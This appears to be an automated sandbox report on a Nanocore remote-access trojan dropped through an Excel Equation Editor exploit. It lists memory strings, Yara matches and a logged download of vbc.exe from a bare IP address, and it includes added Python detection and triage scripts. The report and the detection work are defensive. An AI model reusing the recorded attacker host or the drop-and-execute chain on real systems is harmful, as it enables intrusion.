Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000006.00000002.520345431.0000000005A70000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.696728913.0000000005AB0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000006.00000002.519221520.0000000002231000.00000004.00000001.sdmp, sys30.exe, 00000007.00000002.689029376.00000000026D1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: sys30.exe String found in binary or memory: http://tempuri.org/PendingProList.xsd
Source: sys30.exe String found in binary or memory: http://tempuri.org/ProductDataSet.xsd
Source: sys30.exe String found in binary or memory: http://tempuri.org/ProductDataSet1.xsd
Source: vbc.exe, 00000006.00000002.519166195.0000000000D82000.00000020.00020000.sdmp, sys30.exe, 00000007.00000000.503536926.0000000001222000.00000020.00020000.sdmp, sys30.exe, 00000008.00000000.515458135.0000000001222000.00000020.00020000.sdmp String found in binary or memory: http://tempuri.org/ProductDataSet1.xsd#CustomerDataTableuThe
Source: sys30.exe String found in binary or memory: http://tempuri.org/login2DataSet.xsd
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000006.00000002.520345431.0000000005A70000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.696728913.0000000005AB0000.00000002.00020000.sdmp, sys30.exe, 00000008.00000002.524598460.0000000005BB0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: sys30.exe, 00000008.00000002.523915323.0000000002A92000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000006.00000002.519221520.0000000002231000.00000004.00000001.sdmp, sys30.exe, 00000007.00000002.689029376.00000000026D1000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: sys30.exe String found in binary or memory: https://www.google.com/
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13E09461.emf
Source: unknown DNS traffic detected: queries for: www.google.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: www.google.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: www.google.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: www.google.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /truth/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 13.238.159.178 | Connection: Keep-Alive
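The four requests recorded above carry the two network indicators worth extracting from this report: three bare "GET /" probes to www.google.com that send only Host and Connection headers (no User-Agent, the shape of a connectivity check), and a fetch of vbc.exe from a bare IPv4 host with an Internet Explorer user-agent string. The following triage script is an added editor's example, not part of the Joe Sandbox output: the request heads are reconstructed from the lines above with assumed CRLF framing, and the flag names are the editor's own.

```python
"""Triage of the HTTP request heads recorded in the report.

Editor's added example, not Joe Sandbox output. The request heads in
SAMPLE_REQUESTS are reconstructed from the traffic lines in the report;
header names and values are taken from it, the CRLF framing is assumed.
"""
from dataclasses import dataclass, field
import ipaddress
from typing import Dict, List

# Extensions that should never be pulled from a bare-IP host by an Office process.
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".msi")

# Constructed sample: three bare probes to www.google.com and the vbc.exe fetch.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: Keep-Alive\r\n\r\n",
    (
        "GET /truth/vbc.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
        "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; "
        "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
        ".NET4.0C; .NET4.0E)\r\nHost: 13.238.159.178\r\nConnection: Keep-Alive\r\n\r\n"
    ),
]


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str]          # header names lower-cased
    flags: List[str] = field(default_factory=list)


def parse_request(raw: str) -> Request:
    """Split a raw HTTP/1.x request head into method, path and a header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


def is_bare_ip(host: str) -> bool:
    """True when the Host header is a literal IP address rather than a name."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def classify(req: Request) -> Request:
    """Attach the editor's triage flags to a parsed request."""
    host = req.headers.get("host", "")
    if "user-agent" not in req.headers:
        req.flags.append("no-user-agent")
    if req.path.lower().endswith(EXECUTABLE_EXT):
        req.flags.append("executable-download")
    if is_bare_ip(host):
        req.flags.append("bare-ip-host")
    # A bare "GET /" carrying nothing but Host and Connection is a reachability probe.
    if req.path == "/" and set(req.headers) <= {"host", "connection"}:
        req.flags.append("connectivity-check")
    return req


def triage(raw_requests: List[str]) -> List[Request]:
    return [classify(parse_request(r)) for r in raw_requests]


def summarize(reqs: List[Request]) -> Dict[str, int]:
    """Count how often each flag fired across the capture."""
    counts: Dict[str, int] = {}
    for r in reqs:
        for f in r.flags:
            counts[f] = counts.get(f, 0) + 1
    return counts


if __name__ == "__main__":
    for r in triage(SAMPLE_REQUESTS):
        print(r.method, r.headers.get("host"), r.path, r.flags)
```

On the report's traffic the google.com probes fire only "no-user-agent" and "connectivity-check", while the vbc.exe request fires "executable-download" and "bare-ip-host"; in a proxy log the second pair, with an Office or EQNEDT32.EXE originating process, is the line to pivot on, whereas the probes alone are too common to alert on.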

E-Banking Fraud:

Yara detected Nanocore RAT
Source: Yara match File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)
Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.26ee188.22.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.740000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.693081728.0000000003770000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.693644067.0000000003908000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
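The two file creations above are the host-side behaviour that matters: the Equation Editor, a legitimate Office component that should never write executables, first caches vbc[1].exe in the IE download folder and then drops it as C:\Users\Public\vbc.exe. The script below is an added editor's example, not part of the Joe Sandbox output, showing how that chain looks as Sysmon-style events and how a detection would pick it out. The image and target paths come from the report; the event ordering, process IDs, the svchost.exe parent for EQNEDT32.EXE (it is started via DCOM) and the field names are assumptions for the sample.

```python
"""Detection of the Equation Editor drop-and-execute chain recorded in the report.

Editor's added example, not Joe Sandbox output. SAMPLE_EVENTS are constructed
Sysmon-style records (ID 11 = FileCreate, ID 1 = ProcessCreate); the image and
target paths are taken from the report, everything else is assumed.
"""
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple

EQNEDT = "eqnedt32.exe"
PE_EXT = {".exe", ".dll", ".scr", ".cpl"}
USER_PROFILES = PureWindowsPath(r"C:\Users")           # covers AppData\...\Content.IE5
PUBLIC_PROFILE = PureWindowsPath(r"C:\Users\Public")   # world-writable drop location

EQN_IMAGE = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXCEL_IMAGE = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"

# Constructed sample events, in the order the report's chain implies.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "image": EXCEL_IMAGE, "parent": r"C:\Windows\explorer.exe", "pid": 2500},
    {"id": 1, "image": EQN_IMAGE, "parent": r"C:\Windows\System32\svchost.exe", "pid": 2600},
    {"id": 11, "image": EQN_IMAGE,
     "target": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe"},
    {"id": 11, "image": EQN_IMAGE, "target": r"C:\Users\Public\vbc.exe"},
    {"id": 1, "image": r"C:\Users\Public\vbc.exe", "parent": EQN_IMAGE, "pid": 2700},
    {"id": 11, "image": EXCEL_IMAGE,
     "target": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13E09461.emf"},
]


def image_name(path: str) -> str:
    """Case-folded file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def is_under(path: str, root: PureWindowsPath) -> bool:
    """True when path lies anywhere below root (comparison is case-insensitive)."""
    return root in PureWindowsPath(path).parents


def detect(events: List[Dict]) -> List[Tuple[str, str]]:
    """Return (rule, path) pairs for every event that matches one of three rules:

    eqnedt32-drops-pe        EQNEDT32.EXE writes a PE-like file under a user profile
    eqnedt32-spawns-process  any process whose parent image is EQNEDT32.EXE
    execution-from-public    a process image started out of C:\\Users\\Public
    """
    alerts: List[Tuple[str, str]] = []
    for e in events:
        if e["id"] == 11 and image_name(e["image"]) == EQNEDT:
            target = PureWindowsPath(e["target"])
            if target.suffix.lower() in PE_EXT and is_under(e["target"], USER_PROFILES):
                alerts.append(("eqnedt32-drops-pe", e["target"]))
        if e["id"] == 1:
            if image_name(e.get("parent", "")) == EQNEDT:
                alerts.append(("eqnedt32-spawns-process", e["image"]))
            if is_under(e["image"], PUBLIC_PROFILE):
                alerts.append(("execution-from-public", e["image"]))
    return alerts


if __name__ == "__main__":
    for rule, path in detect(SAMPLE_EVENTS):
        print(f"{rule:26} {path}")
```

The Excel write of 13E09461.emf deliberately stays silent: Office writes rendered images into Content.MSO all the time, and the rule keys on the writer being EQNEDT32.EXE plus a PE extension, not on the cache folder. The child-process rule needs no path condition at all, because the Equation Editor has no legitimate reason to start anything.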
Yara signature match
Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
